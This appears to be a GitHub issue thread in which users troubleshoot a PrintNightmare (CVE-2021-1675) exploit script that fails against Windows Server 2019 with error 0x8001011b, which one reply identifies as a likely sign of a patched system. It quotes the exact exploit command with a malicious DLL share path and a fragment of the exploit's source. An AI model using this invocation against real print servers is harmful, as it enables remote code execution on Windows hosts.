unkown error code: 0x8001011b

[Ach13v3-M0n7]

I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.

I have confirmed:

• SMB connectivity Ubuntu > Win19 and Win19 > Ubuntu.
• scan via rpcdump.py output returns Protocol: [MS-RPRN]: Print System Remote Protocol
• Guest Login is enabled on Win19

The command I am running to throw the exploit is:
sudo python3 CVE-2021-1675.py 'notadmin:[email protected]' '\\10.209.1.2\share\PrintNightmare.dll'

Output received back is:

[*] Connecting to ncacn_np:10.209.1.1[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath: RPRN Session Error: unkown error code: 0x8001011b

I notice in the source code, that this exception is on Line 174:

  #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
    if not options.pDriverPath:
        try:
            blob = getDriver(dce, handle)
            pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
            if not "FileRepository" in pDriverPath:
                print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
                print("[-] Specify pDriverPath manually")
                sys.exit(1)
        except Exception as e:
            print('[-] Failed to enumerate remote pDriverPath')
            print(str(e))
            sys.exit(1)

I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.

[shaaati]

Maybe this still helps someone:
0x8001011b is the error code for RPC_E_ACCESS_DENIED. I know that this is an indication of a fixed system when returned for RpcAddPrinterDriver (see, e.g., the functionality of https://github.com/ly4k/PrintNightmare).
In this case, the error is returned for RpcEnumPrinterDrivers. I don't know in detail if this is also a valid sign of a patched system, but it does seem likely.

#59 seems to reference the same issue, so I am cross-referencing it here in case others are looking for an answer.

[TheFlu007]

I am attempting the exploit from an Ubuntu 20 server against a standalone Windows Server 2019 box.

I have confirmed:

• SMB connectivity Ubuntu > Win19 and Win19 > Ubuntu.
• scan via rpcdump.py output returns Protocol: [MS-RPRN]: Print System Remote Protocol
• Guest Login is enabled on Win19

The command I am running to throw the exploit is: sudo python3 CVE-2021-1675.py 'notadmin:[email protected]' '\\10.209.1.2\share\PrintNightmare.dll'

Output received back is:

[*] Connecting to ncacn_np:10.209.1.1[\PIPE\spoolss]
[+] Bind OK
[-] Failed to enumerate remote pDriverPath: RPRN Session Error: unkown error code: 0x8001011b

I notice in the source code, that this exception is on Line 174:

  #find "C:\\Windows\\System32\\DriverStore\\FileRepository\\ntprint.inf_amd64_83aa9aebf5dffc96\\Amd64\\UNIDRV.DLL" path
    if not options.pDriverPath:
        try:
            blob = getDriver(dce, handle)
            pDriverPath = str(pathlib.PureWindowsPath(blob['DriverPathArray']).parent) + '\\UNIDRV.DLL'
            if not "FileRepository" in pDriverPath:
                print("[-] pDriverPath {0}, expected :\\Windows\\System32\\DriverStore\\FileRepository\\.....".format(pDriverPath))
                print("[-] Specify pDriverPath manually")
                sys.exit(1)
        except Exception as e:
            print('[-] Failed to enumerate remote pDriverPath')
            print(str(e))
            sys.exit(1)

I manually checked my Win19 to see if I had the particular driver path, but I do not. I'm not sure if the lack of the particular driver could be the issue, but I have little more to go on than the "[-]" error line in my output.

Its been patched